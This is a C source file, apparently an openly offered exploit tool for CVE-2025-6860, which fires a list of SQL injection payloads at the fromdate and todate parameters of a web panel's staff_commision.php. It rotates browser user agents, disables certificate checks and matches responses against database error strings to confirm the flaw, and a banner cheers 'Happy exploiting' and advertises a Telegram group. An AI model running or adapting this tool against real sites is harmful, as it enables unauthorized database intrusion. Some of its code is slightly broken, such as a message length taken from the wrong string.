#include #include #include #include #include "argparse.h" struct Mem { char *buffer; size_t len; }; const char *p[] = { "' OR 1 -- -", "\" OR \"\" = \"", " OR 1 = 1 -- -", "' OR '' = '", "AND 1", "AND 0", "AND true", "AND false", "1-false", "-1 UNION SELECT 1 INTO @,@,@", "admin' or '1'='1", "admin' or '1'='1'--", "admin' or '1'='1'#", "-", " ", "&", "^", "*" }; const char *sq[] = { "syntax error", "Warning: mysql_fetch_assoc()", "Warning: mysqli_query()", "SQLSTATE", "Invalid query", "Unclosed quotation mark", "quoted string not properly terminated", "You have an error in your SQL syntax", "Warning: pg_query()", "Warning: pg_send_query()", "pg_query(): Query failed", "Microsoft OLE DB Provider for SQL Server", "Incorrect syntax near", "Unclosed quotation mark after the character string", "SQL error", "mysql_num_rows() expects parameter", "mysql_fetch_array() expects parameter", "Fatal error", "mysql_fetch_object() expects parameter", "mysqli_fetch_assoc() expects parameter", "mysql_fetch_row() expects parameter", "supplied argument is not a valid MySQL", "Warning: mssql_query()", "syntax error at or near", "org.hibernate.exception", "unexpected end of SQL command", "SQL query failed", "database query error", "DB2 SQL error", "OLE DB provider returned message", "JDBC SQL error", "pg_fetch_array() expects parameter", "pg_fetch_assoc() expects parameter", "Query execution failed", "Database error", "Unhandled Exception", "ORA-00933: SQL command not properly ended", "ORA-01756: quoted string not properly terminated", "SQL Server Error", "mysql_numrows() expects parameter", "mysql_num_fields() expects parameter", "Syntax error or access violation", "SQL syntax error", "NativeError", "ODBC SQL Server Driver", "Warning: odbc_exec()", "Warning: odbc_prepare()", "Fatal error: Call to a member function", }; const char *a[] = { "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US Safari/537.36", "Mozilla/5.0 (Linux; Android 4.4.2; SM-P600 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0", "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36", "Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36", "Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0" }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (!tmp) return 0; m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void g(CURL *curl) { static int c = 0; static int nma = sizeof(a) / sizeof(a[0]); const char *us = a[c]; c = (c + 1) % nma; curl_easy_setopt(curl, CURLOPT_USERAGENT, us); } void sd(const char *u) { const char *m1 = "\e[1;32m[+] Don't forget to put a correct link consisting of the parameters that suffer from the vulnerability.\n"; const char *m2 = "\n\e[1;32m[+] which are fromdate and todate.\n"; const char *sk = "\n\e[1;37m-------------------------------------------------------------------------------------------------------------------\n"; const char *m3 = "\n\e[1;34m[+] Exploitation of CVE-2025-6860 has begun..."; size_t l1 = strlen(m1) - 1; size_t l2 = strlen(m2) - 1; size_t l3 = strlen(m2) - 1; __asm__ volatile ( "xor %%rax, %%rax\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[m1], %%rsi\n\t" "mov %[l1], %%rdx\n\t" "syscall\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[m2], %%rsi\n\t" "mov %[l2], %%rdx\n\t" "syscall\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[m3], %%rsi\n\t" "mov %[l3], %%rdx\n\t" "syscall\n\t" : : [m1] "r"(m1), [l1] "r"(l1), [m2] "r"(m2), [l2] "r"(l2), [m3] "r"(m3), [l3] "r"(l3) : "rax","rdi","rsi","rdx" ); CURL *curl = curl_easy_init(); if (curl == NULL) { const char *i = "/sbin/ifconfig"; const char *argv[] = {NULL, i}; const char *v = {NULL}; const char *e1 = "\n\e[1;31m[-] Error Create Object Curl, Please Check Your Connection\n"; const char *e2 = "\n\e[1;31m[-] Exemple Command : ping google.com / ifconfig \n"; const char *e3 = "\n\e[1;36m[+] Start Command ifconfig For check Ip And Connection...\n"; size_t el1 = strlen(e1) - 1; size_t el2 = strlen(e2) - 1; size_t el3 = strlen(e3) - 1; __asm__ volatile ( "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[e1], %%rsi\n\t" "mov %[el1], %%rdx\n\t" "syscall\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[e2], %%rsi\n\t" "mov %[el2], %%rdx\n\t" "syscall\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[e3], %%rsi\n\t" "mov %[el3], %%rdx\n\t" "syscall\n\t" : : [e1] "r" (e1), [el1] "r" (el1), [e2] "r" (e2), [el2] "r" (el2), [e3] "r" (e3), [el3] "r" (el3) :"rax", "rdi", "rsi", "rdx" ); __asm__ volatile ( "mov $59, %%rax\n\t" "mov %[i], %%rdi\n\t" "mov %[argv], %%rsi\n\t" "mov %[v], %%rdx\n\t" "syscall\n\t" "mov $60, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : [i] "r"(i), [argv] "r"(argv), [v] "r"(v) : "rax","rdi","rsi","rdx" ); } char f[2043]; CURLcode r; struct Mem chunk = {NULL, 0}; int np = sizeof(p) / sizeof(p[0]); for (int k= 0; k < np ;k++) { if (curl) { const char *fp = p[k]; snprintf(f, sizeof(f), "%s/panel/staff_commision.php?fromdate=%s&todate=%s", u, fp, fp); curl_easy_setopt(curl, CURLOPT_URL, f); struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com/"); h = curl_slist_append(h, "Cache-Control: no-cache"); h = curl_slist_append(h, "Pragma: no-cache"); struct timespec req = {0}; req.tv_sec = 0; req.tv_nsec = 500000000; long ret; __asm__ volatile ( "mov $35, %%rax\n\t" "mov $1, %%rdi\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" "mov %%rax, %0\n\t" : "=r" (ret) : "r" (&req) : "rax", "rdi", "rsi" ); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); g(curl); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &chunk); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); __asm__ volatile ( "mov $35, %%rax\n\t" "mov $1, %%rdi\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" "mov %%rax, %0\n\t" : "=r" (ret) : "r" (&req) : "rax", "rdi", "rsi" ); r = curl_easy_perform(curl); if (r == CURLE_OK) { long ht = 0; printf("[+] Target URL : %s", u); const char *s = "\e[1;34m[+] Request Send Success !\n"; size_t sl = strlen(s) - 1; __asm__ volatile ( "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[s], %%rsi\n\t" "mov %[sl], %%rdx\n\t" "syscall\n\t" : : [s] "r" (s), [sl] "r" (sl) :"rax", "rdi", "rsi", "rdx" ); printf("\e[1;34m[+] FULL URL : %s\n", f); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &ht); printf("\e[1;32m[+] HTTP CODE : %ld\n", ht); if (ht == 200 || ht == 201 || ht == 202 || ht == 203 || ht == 204 || ht == 206) { int csq = sizeof(sq) / sizeof(sq[0]); int found = 0; printf("\e[1;34m[+] The payload was successfully responded to by the server !\n"); printf("\e[1;34m[+] The server has an SQL vulnerability !\n"); for (int key = 0; key < csq ; key++) { if (strstr(chunk.buffer, sq[key]) != NULL) { found = 1; break; } } if (found) { printf("\e[1;34m[+] A suspicious word was found in a response !\n"); printf("\e[1;34m[+] The server suffers from a CVE-2025-6860 vulnerability !\n"); curl_slist_free_all(h); } else { printf("\e[1;31m[-] No suspicious patterns found in the server response, vulnerability CVE-2025-6860 not detected.\n"); printf("\e[1;33m[!] Try to make sure that the link is correct and you can access it.\n"); curl_slist_free_all(h); } } else { printf("\e[1;31m[-] Http Code Not 200 !\n"); printf("\e[1;32m[+] HTTP CODE : %ld\n", ht); printf("\e[1;33m[!] Please Check Your Connection on Server !\n"); printf("\e[1;33m[!] Exemple Command Check Access Connection : ping target.com\n"); curl_slist_free_all(h); } } else { fprintf(stderr, "\n\e[1;31m[-] curl_easy_perform() failed: %s\n", curl_easy_strerror(r)); exit(1); } } } free(chunk.buffer); curl_easy_cleanup(curl); } int main(int argc, const char **argv) { printf( "\e[1;31m" " ⢀⣠⣤⣶⣶⣿⣿⣿⣿⣿⣷⣶⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣶⡿⠿⢿⣿⣶⣶⣤⣄⡀⠀⠀⠀⠀⠀\n" " ⠀⠀⠀⠀⠀⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠞⠋⠉⠀⠀⠀⠀⠀⠀⠀⠉⠛⢿⣿⣷⣄⠀⠀⠀\n" " ⠀⠀⠀⣠⣾⣿⣿⣿⣿⠿⠛⠉⠁⠀⠀⠀⠀⠉⠙⠻⢿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣶⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣄⠀⠀\n" " ⠀⠀⣼⣿⣿⣿⡿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣷⡀⠀⠀⠀⢀⣶⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣧⠀⠀\n" " ⠀⣼⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣿⣄⠀⠀⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣧⠀ \n" " ⢸⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⢂⣾⣿⣿⣿⠿⠛⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿ \n" " ⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⡿⢡⣿⣿⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿ \n" " ⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣱⣿⣿⣿⡿⡁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⡇ \n" " ⢿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⡟⣴⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⡇ \n" " ⠸⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠏⢸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿ \n" " ⠀⢻⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⣿⣿⡿⠃⠀⠀⠹⣿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⠃⠀ \n" " ⠀⠀⠹⣿⣿⣿⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⣿⠟⠁⠀⠀⠀⠀⠈⢻⣿⣿⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⡿⠃⠀⠀\n" " ⠀⠀⠀⠈⠻⣿⣿⣿⣿⣶⣤⣀⣀⠀⠀⠀⣀⣀⣤⣶⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣶⣤⣀⣀⠀⠀⠀⢀⣀⣤⣶⣿⣿⣿⣿⠟⠀⠀⠀\n" " ⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠁⠀⠀⠀⠀\n" " ⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠛⠻⠿⠿⠿⠿⠿⠟⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⢿⣿⣿⣿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "\e[1;37m\t\t\t\t\t@Byte Reaper\n" ); printf("\e[1;37m=> My Telegram : @ByteReaper0\n"); printf("\e[1;37m=> My Group : https://t.me/exploiterX0\n"); printf("\e[1;34m[+] Happy exploiting !!\n"); printf("\e[1;37m-------------------------------------------------------------------------------------------------------------------\n"); const char *u = NULL; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &u, "Enter Target URL"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!u) { printf("\e[1;31m[-] Please Enter Target URL !\n"); printf("\e[1;33m[!] Exemple : ./exploit -u http://target.com/panel/staff_commision.php?fromdate=&todate=\n"); __asm__ volatile ( "mov $60, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rax", "rdi" ); } else { sd(u); } return 0; }